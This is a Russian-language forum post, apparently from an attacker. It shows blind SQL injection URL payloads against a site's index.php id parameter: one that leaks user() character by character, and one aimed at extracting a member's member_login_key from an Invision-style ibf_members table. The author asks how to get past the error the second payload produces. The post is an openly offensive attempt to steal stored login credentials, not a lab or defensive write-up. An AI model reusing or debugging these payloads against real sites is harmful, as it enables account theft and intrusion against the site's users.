Есть скрипт, подверженный Blind SQL-инъекции: Code: index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring(user(),1,1)))>1/* запрос успешно выполняется, все символы спокойно перебираются. Если вместо user() поставить (select+member_login_key+from+ibf_members+where+id=2), чтоб было вот так: Code: index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring((select+member_login_key+from+ibf_members+where+id=2),1,1)))>1/* то выдается ошибка: Указанные поле и таблица точно существуют. Пробовал также варианты с aes_decrypt/aes_encrypt, char(), concat() - безрезультатно. Кто-нить знает, почему выдается эта ошибка, и как это обойти? Запрос ведь верный вроде...